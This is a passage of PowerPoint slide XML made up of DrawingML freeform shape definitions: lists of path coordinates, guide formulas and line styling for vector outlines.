                      <a:pt x="14" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="92"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36310" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4250" y="2855"/>
                <a:ext cx="726" cy="254"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 697 w 726"/>
                  <a:gd name="T1" fmla="*/ 213 h 254"/>
                  <a:gd name="T2" fmla="*/ 665 w 726"/>
                  <a:gd name="T3" fmla="*/ 168 h 254"/>
                  <a:gd name="T4" fmla="*/ 611 w 726"/>
                  <a:gd name="T5" fmla="*/ 139 h 254"/>
                  <a:gd name="T6" fmla="*/ 584 w 726"/>
                  <a:gd name="T7" fmla="*/ 136 h 254"/>
                  <a:gd name="T8" fmla="*/ 611 w 726"/>
                  <a:gd name="T9" fmla="*/ 124 h 254"/>
                  <a:gd name="T10" fmla="*/ 574 w 726"/>
                  <a:gd name="T11" fmla="*/ 105 h 254"/>
                  <a:gd name="T12" fmla="*/ 618 w 726"/>
                  <a:gd name="T13" fmla="*/ 130 h 254"/>
                  <a:gd name="T14" fmla="*/ 654 w 726"/>
                  <a:gd name="T15" fmla="*/ 127 h 254"/>
                  <a:gd name="T16" fmla="*/ 395 w 726"/>
                  <a:gd name="T17" fmla="*/ 77 h 254"/>
                  <a:gd name="T18" fmla="*/ 459 w 726"/>
                  <a:gd name="T19" fmla="*/ 76 h 254"/>
                  <a:gd name="T20" fmla="*/ 457 w 726"/>
                  <a:gd name="T21" fmla="*/ 85 h 254"/>
                  <a:gd name="T22" fmla="*/ 392 w 726"/>
                  <a:gd name="T23" fmla="*/ 99 h 254"/>
                  <a:gd name="T24" fmla="*/ 432 w 726"/>
                  <a:gd name="T25" fmla="*/ 103 h 254"/>
                  <a:gd name="T26" fmla="*/ 417 w 726"/>
                  <a:gd name="T27" fmla="*/ 120 h 254"/>
                  <a:gd name="T28" fmla="*/ 432 w 726"/>
                  <a:gd name="T29" fmla="*/ 160 h 254"/>
                  <a:gd name="T30" fmla="*/ 408 w 726"/>
                  <a:gd name="T31" fmla="*/ 133 h 254"/>
                  <a:gd name="T32" fmla="*/ 385 w 726"/>
                  <a:gd name="T33" fmla="*/ 181 h 254"/>
                  <a:gd name="T34" fmla="*/ 373 w 726"/>
                  <a:gd name="T35" fmla="*/ 132 h 254"/>
                  <a:gd name="T36" fmla="*/ 351 w 726"/>
                  <a:gd name="T37" fmla="*/ 32 h 254"/>
                  <a:gd name="T38" fmla="*/ 374 w 726"/>
                  <a:gd name="T39" fmla="*/ 76 h 254"/>
                  <a:gd name="T40" fmla="*/ 336 w 726"/>
                  <a:gd name="T41" fmla="*/ 115 h 254"/>
                  <a:gd name="T42" fmla="*/ 307 w 726"/>
                  <a:gd name="T43" fmla="*/ 157 h 254"/>
                  <a:gd name="T44" fmla="*/ 275 w 726"/>
                  <a:gd name="T45" fmla="*/ 143 h 254"/>
                  <a:gd name="T46" fmla="*/ 236 w 726"/>
                  <a:gd name="T47" fmla="*/ 133 h 254"/>
                  <a:gd name="T48" fmla="*/ 217 w 726"/>
                  <a:gd name="T49" fmla="*/ 80 h 254"/>
                  <a:gd name="T50" fmla="*/ 255 w 726"/>
                  <a:gd name="T51" fmla="*/ 76 h 254"/>
                  <a:gd name="T52" fmla="*/ 308 w 726"/>
                  <a:gd name="T53" fmla="*/ 63 h 254"/>
                  <a:gd name="T54" fmla="*/ 353 w 726"/>
                  <a:gd name="T55" fmla="*/ 25 h 254"/>
                  <a:gd name="T56" fmla="*/ 402 w 726"/>
                  <a:gd name="T57" fmla="*/ 249 h 254"/>
                  <a:gd name="T58" fmla="*/ 499 w 726"/>
                  <a:gd name="T59" fmla="*/ 224 h 254"/>
                  <a:gd name="T60" fmla="*/ 158 w 726"/>
                  <a:gd name="T61" fmla="*/ 198 h 254"/>
                  <a:gd name="T62" fmla="*/ 185 w 726"/>
                  <a:gd name="T63" fmla="*/ 188 h 254"/>
                  <a:gd name="T64" fmla="*/ 225 w 726"/>
                  <a:gd name="T65" fmla="*/ 200 h 254"/>
                  <a:gd name="T66" fmla="*/ 274 w 726"/>
                  <a:gd name="T67" fmla="*/ 207 h 254"/>
                  <a:gd name="T68" fmla="*/ 289 w 726"/>
                  <a:gd name="T69" fmla="*/ 223 h 254"/>
                  <a:gd name="T70" fmla="*/ 199 w 726"/>
                  <a:gd name="T71" fmla="*/ 212 h 254"/>
                  <a:gd name="T72" fmla="*/ 170 w 726"/>
                  <a:gd name="T73" fmla="*/ 132 h 254"/>
                  <a:gd name="T74" fmla="*/ 181 w 726"/>
                  <a:gd name="T75" fmla="*/ 132 h 254"/>
                  <a:gd name="T76" fmla="*/ 520 w 726"/>
                  <a:gd name="T77" fmla="*/ 66 h 254"/>
                  <a:gd name="T78" fmla="*/ 523 w 726"/>
                  <a:gd name="T79" fmla="*/ 79 h 254"/>
                  <a:gd name="T80" fmla="*/ 526 w 726"/>
                  <a:gd name="T81" fmla="*/ 103 h 254"/>
                  <a:gd name="T82" fmla="*/ 141 w 726"/>
                  <a:gd name="T83" fmla="*/ 107 h 254"/>
                  <a:gd name="T84" fmla="*/ 170 w 726"/>
                  <a:gd name="T85" fmla="*/ 140 h 254"/>
                  <a:gd name="T86" fmla="*/ 148 w 726"/>
                  <a:gd name="T87" fmla="*/ 177 h 254"/>
                  <a:gd name="T88" fmla="*/ 88 w 726"/>
                  <a:gd name="T89" fmla="*/ 123 h 254"/>
                  <a:gd name="T90" fmla="*/ 44 w 726"/>
                  <a:gd name="T91" fmla="*/ 55 h 254"/>
                  <a:gd name="T92" fmla="*/ 0 w 726"/>
                  <a:gd name="T93" fmla="*/ 3 h 254"/>
                  <a:gd name="T94" fmla="*/ 47 w 726"/>
                  <a:gd name="T95" fmla="*/ 19 h 254"/>
                  <a:gd name="T96" fmla="*/ 88 w 726"/>
                  <a:gd name="T97" fmla="*/ 56 h 254"/>
                  <a:gd name="T98" fmla="*/ 135 w 726"/>
                  <a:gd name="T99" fmla="*/ 88 h 254"/>
                  <a:gd name="T100" fmla="*/ 357 w 726"/>
                  <a:gd name="T101" fmla="*/ 223 h 254"/>
                  <a:gd name="T102" fmla="*/ 375 w 726"/>
                  <a:gd name="T103" fmla="*/ 223 h 254"/>
                  <a:gd name="T104" fmla="*/ 359 w 726"/>
                  <a:gd name="T105" fmla="*/ 231 h 254"/>
                  <a:gd name="T106" fmla="*/ 351 w 726"/>
                  <a:gd name="T107" fmla="*/ 225 h 254"/>
                  <a:gd name="T108" fmla="*/ 420 w 726"/>
                  <a:gd name="T109" fmla="*/ 232 h 254"/>
                  <a:gd name="T110" fmla="*/ 413 w 726"/>
                  <a:gd name="T111" fmla="*/ 227 h 254"/>
                  <a:gd name="T112" fmla="*/ 438 w 726"/>
                  <a:gd name="T113" fmla="*/ 218 h 254"/>
                  <a:gd name="T114" fmla="*/ 682 w 726"/>
                  <a:gd name="T115" fmla="*/ 225 h 254"/>
                  <a:gd name="T116" fmla="*/ 564 w 726"/>
                  <a:gd name="T117" fmla="*/ 150 h 254"/>
                  <a:gd name="T118" fmla="*/ 523 w 726"/>
                  <a:gd name="T119" fmla="*/ 140 h 254"/>
                  <a:gd name="T120" fmla="*/ 564 w 726"/>
                  <a:gd name="T121" fmla="*/ 150 h 254"/>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26"/>
                  <a:gd name="T184" fmla="*/ 0 h 254"/>
                  <a:gd name="T185" fmla="*/ 726 w 726"/>
                  <a:gd name="T186" fmla="*/ 254 h 254"/>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26" h="254">
                    <a:moveTo>
                      <a:pt x="724" y="133"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="726" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="606" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="654" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="133"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="388" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="388" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
